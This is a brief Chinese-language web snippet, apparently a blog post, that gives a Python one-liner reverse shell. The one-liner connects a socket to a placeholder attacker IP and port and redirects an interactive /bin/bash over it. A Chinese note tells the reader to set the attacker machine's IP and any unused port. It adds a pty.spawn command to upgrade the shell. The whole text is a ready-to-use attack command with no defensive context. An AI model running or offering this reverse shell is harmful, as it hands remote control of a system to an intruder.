python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
使用python进行反dshell,IP改成攻击机ip,端口随意,没有被用过就可以
或者启用python交互模式:
python -c 'import pty; pty.spawn("/bin/bash")'
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)